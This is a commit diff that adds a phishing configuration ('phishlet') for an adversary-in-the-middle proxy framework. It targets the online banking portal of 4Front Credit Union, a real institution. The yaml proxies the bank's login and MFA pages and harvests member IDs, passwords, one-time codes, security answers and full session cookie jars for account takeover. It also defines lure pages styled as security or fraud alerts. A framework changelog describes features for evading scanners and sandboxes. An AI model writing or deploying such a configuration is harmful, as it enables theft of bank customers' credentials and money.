Add 4Front Credit Union phishing configuration

.gitignore

@@ -1,6 +1,5 @@
-bin/
-docs/
-img/
 release/
 build/
-phishlets/test-*
+private/
+/phishlets
+!/phishlets/example.yaml

4front.yaml

@@ -0,0 +1,108 @@
+name: "4front"
+description: "4Front Credit Union Online Banking Phishlet - Full AiTM Takeover"
+
+domain: "4frontcu.com"  # Real domain
+
+phish_subdomains:
+  - "secure"
+  - "online"
+  - "login"
+  - "account"
+
+paths:
+  - path: "/"
+    type: "redirect"
+    target: "https://ob.4frontcu.com/"  # Adjust if portal is ib.4frontcu.com or digital.4frontcu.com — test first
+
+  - path: "/login"
+    type: "proxy"
+    target: "https://ob.4frontcu.com/login"  # Main login endpoint
+
+  - path: "/auth"
+    type: "proxy"
+    target: "https://ob.4frontcu.com/auth"
+
+  - path: "/verify"
+    type: "proxy"
+    target: "https://ob.4frontcu.com/verify"  # OTP/MFA page
+
+  - path: "/dashboard"
+    type: "proxy"
+    target: "https://ob.4frontcu.com/dashboard"
+
+  - path: "/.*"
+    type: "proxy"
+    target: "https://ob.4frontcu.com$1"  # Catch-all proxy
+
+credentials:
+  username:
+    key: "member_id"          # Common field: Member Number / User ID
+    search:
+      - "name=\"member_id\""
+      - "id=\"username\""
+      - "name=\"user\""
+    type: "username"
+
+  password:
+    key: "password"
+    search:
+      - "name=\"password\""
+      - "id=\"password\""
+    type: "password"
+
+  custom:
+    - key: "otp_code"
+      search:
+        - "name=\"otp\""
+        - "name=\"token\""
+        - "name=\"code\""
+      type: "text"
+
+    - key: "security_question"
+      search:
+        - "name=\"answer\""
+      type: "text"
+
+auth_tokens:
+  - name: "session_cookie"
+    search:
+      - "Set-Cookie: (JSESSIONID|PHPSESSID|ASP.NET_SessionId|sessionid)=([^;]+)"
+    type: "cookie"
+
+  - name: "csrf_token"
+    search:
+      - "<input.*name=\"csrf|token|authenticity_token\".*value=\"([^\"]+)\""
+    type: "html"
+
+  - name: "all_cookies"
+    type: "all_cookies"  # Grabs full cookie jar for session import
+
+lures:
+  - name: "security_alert"
+    path: "/verify-account"
+    redirect: "/login"
+
+  - name: "fraud_block"
+    path: "/account-locked"
+    redirect: "/login"
+
+force_post:
+  - path: "/login"
+    params:
+      - "member_id"
+      - "password"
+
+  - path: "/verify"
+    params:
+      - "otp_code"
+
+blacklist:
+  - "favicon.ico"
+  - "robots.txt"
+
+javascript:
+  enabled: true
+  inject: |
+    // Optional JS for better capture / anti-detection bypass
+    console.log("4Front Phishlet Loaded");
+    // Hide Evilginx indicators if needed

CHANGELOG

@@ -1,4 +1,62 @@
-2.4.0
+# Unreleased
+- Fixed: Redirection to `redirect_url` on page reload after authorization tokens have been captured.
+
+# 3.3.0
+- Feature: Official GoPhish integration, using the fork: https://github.com/kgretzky/gophish
+- Feature: Added support to load custom TLS certificates from a public certificate file and a private key file stored in `~/.evilginx/crt/sites/<hostname>/`. Will load `fullchain.pem` and `privkey.pem` pair or a combination of a `.pem`/`.crt` (public certificate) and a `.key` (private key) file. Make sure to run without `-developer` flag and disable autocert retrieval with `config autocert off`.
+- Feature: Added ability to inject `force_post` POST parameters into JSON content body (by [@yudasm_](https://twitter.com/yudasm_)).
+- Feature: Added ability to disable automated TLS certificate retrieval from LetsEncrypt with `config autocert <on/off>`.
+- Feature: Evilginx will now properly recognize origin IP for requests coming from behind a reverse proxy (nginx/apache2/cloudflare/azure).
+- Fixed: Infinite redirection loop if the lure URL path was the same as the login path defined in the phishlet.
+- Fixed: Added support for exported cookies with names prefixed with `__Host-` and `__Secure-`.
+- Fixed: Global `unauth_url` can now be set to an empty string to have the server return `403` on unauthorized requests.
+- Fixed: Unauthorized redirects and blacklisting would be ignored for `proxy_hosts` with `session: false` (default) making it easy to detect evilginx by external scanners.
+- Fixed: IP address `127.0.0.1` is now ignored from being added to the IP blacklist.
+- Fixed: Added support for more TLDs to use with phishing domains (e.g. `xyz`, `art`, `tech`, `wiki`, `lol` & more)
+- Fixed: Credentials will now be captured also from intercepted requests.
+
+# 3.2.0
+- Feature: URL redirects on successful token capture now work dynamically on every phishing page. Pages do not need to reload or redirect first for the redirects to happen.
+- Feature: Lures can now be paused for a fixed time duration with `lures pause <id>`. Useful when you want to briefly redirect your lure URL when you know sandboxes will try to scan them.
+- Feature: Added phishlet ability to intercept HTTP requests and return custom responses via a new `intercept` section.
+- Feature: Added a new optional `redirect_url` value for phishlet config, which can hold a default redirect URL, to redirect to, once tokens are successfully captured. `redirect_url` set for the specific lure will override this value.
+- Feature: You can now override globally set unauthorized redirect URL per phishlet with `phishlet unauth_url <phishlet> <url>`.
+- Fixed: Disabled caching for HTML and Javascript content to make on-the-fly proxied content replacements and injections more reliable.
+- Fixed: Improved JS injection by adding `<script src"...">` references into HTML pages, instead of dumping the whole script there.
+- Fixed: Blocked requests will now redirect using javascript, instead of HTTP location header.
+- Fixed: Changed `redirect_url` to `unauth_url` in global config to avoid confusion.
+- Fixed: Fixed HTTP status code response for Javascript redirects.
+- Fixed: Javascript redirects now happen on `text/html` pages with valid HTML content.
+- Fixed: Removed `ua_filter` column from the lures list view. It is still viewable in lure detailed view.
+
+# 3.1.0
+- Feature: Listening IP and external IP can now be separated with `config ipv4 bind <bind_ipv4_addr>` and `config ipv4 external <external_ipv4_addr>` to help with properly setting up networking.
+- Fixed: Session cookies (cookies with no expiry date set) are now correctly captured every time. There is no need to specify `:always` key modifier for `auth_tokens` to capture them.
+- Fixed: Captured custom tokens are now displayed properly and values are not truncated.
+
+# 3.0.0
+- Feature: TLS certificates from LetsEncrypt will now get automatically renewed.
+- Feature: Automated retrieval and renewal of LetsEncrypt TLS certificates is now managed by `certmagic` library.
+- Feature: Authentication tokens can now be captured not only from cookies, but also from response body and HTTP headers.
+- Feature: Phishing pages can now be embedded inside of iframes.
+- Feature: Changed redirection after successful session capture from `Location` header redirection to injected Javascript redirection.
+- Feature: Changed config file from `config.yaml` to `config.json`, permanently changing the configuration format to JSON.
+- Feature: Changed open-source license from GPL to BSD-3.
+- Feature: Added `always` modifier for capturing authentication cookies, forcing to capture a cookie even if it has no expiration time.
+- Feature: Added `phishlet <phishlet>` command to show details of a specific phishlet.
+- Feature: Added phishlet templates, allowing to create child phishlets with custom parameters like pre-configured subdomain or domain. Parameters can be defined anywhere in the phishlet file as `{param_name}` and every occurence will be replaced with pre-configured parameter values of the created child phishlet.
+- Feature: Added `phishlet create` command to create child phishlets from template phishlets.
+- Feature: Renamed lure `templates` to lure `redirectors` due to name conflict with phishlet templates.
+- Feature: Added `{orig_hostname}` and `{orig_domain}` support for `sub_filters` phishlet setting.
+- Feature: Added `{basedomain}` and `{basedomain_regexp}` support for `sub_filters` phishlet setting.
+- Fixed: One target can now have multiple phishing sessions active for several different phishlets.
+- Fixed: Cookie capture from HTTP packet response will not stop mid-term, ignoring missing `opt` cookies, when all authentication cookies are already captured.
+- Fixed: `trigger_paths` regexp will now match a full string instead of triggering true when just part of it is detected in URL path.
+- Fixed: Phishlet table rows are now sorted alphabetically.
+- Fixed: Improved phishing session management to always create a new session when lure URL is hit if session cookie is not present, even when IP whitelist is set.
+- Fixed: WebSocket connections are now properly proxied.
+
+# 2.4.0
 - Feature: Create and set up pre-phish HTML templates for your campaigns. Create your HTML file and place `{lure_url_html}` or `{lure_url_js}` in code to manage redirection to the phishing page with any form of user interaction. Command: `lures edit <id> template <template>`
 - Feature: Create customized hostnames for every phishing lure. Command: `lures edit <id> hostname <hostname>`.
 - Feature: Support for routing connection via SOCKS5 and HTTP(S) proxies. Command: `proxy`.
@@ -14,30 +72,30 @@
 - Improved autofill for `lures edit` commands and switched positions of `<id>` and the variable name.
 - Increased the duration of whitelisting authorized connections for whole IP address from 15 seconds to 10 minutes.
 
-2.3.3
+# 2.3.3
 - Fixed: Multiple concurrent map writes when whitelisting IPs during heavy loads.
 
-2.3.2
+# 2.3.2
 - ACMEv2 support added to comply with LetsEncrypt requirements.
 - Fixed session cookie output to support EditThisCookie on the latest Chrome version.
 - Increased timeouts for proxying HTTP packets to 45 seconds.
 - Added support for Go modules.
 
-2.3.1
+# 2.3.1
 - Redirection is now triggered only for responses with `text/html` content-type header.
 
-2.3.0
+# 2.3.0
 - Proxy can now create most of required `sub_filters` on its own, making it much easier to create new phishlets.
 - Added lures, with which you can prepare custom phishing URLs with each having its own set of unique options (`help lures` for more info).
 - Added OpenGraph settings for lures, allowing to create enticing content for link previews.
 - Added ability to inject custom Javascript into proxied pages.
 - Injected Javascript can be customized with values of custom parameters, specified in lure options.
 - Deprecated `landing_path` and replaced it with `login` section, which contains the domain and path for website's login page.
 
-2.2.1
+# 2.2.1
 - Fixed: `type` with value `json` was not correctly activated when set under `credentials`.
 
-2.2.0
+# 2.2.0
 - Now when any of `auth_urls` is triggered, the redirection will take place AFTER response cookies for that request are captured.
 - Regular expression groups working with `sub_filters`.
 - Phishlets are now listed in a table.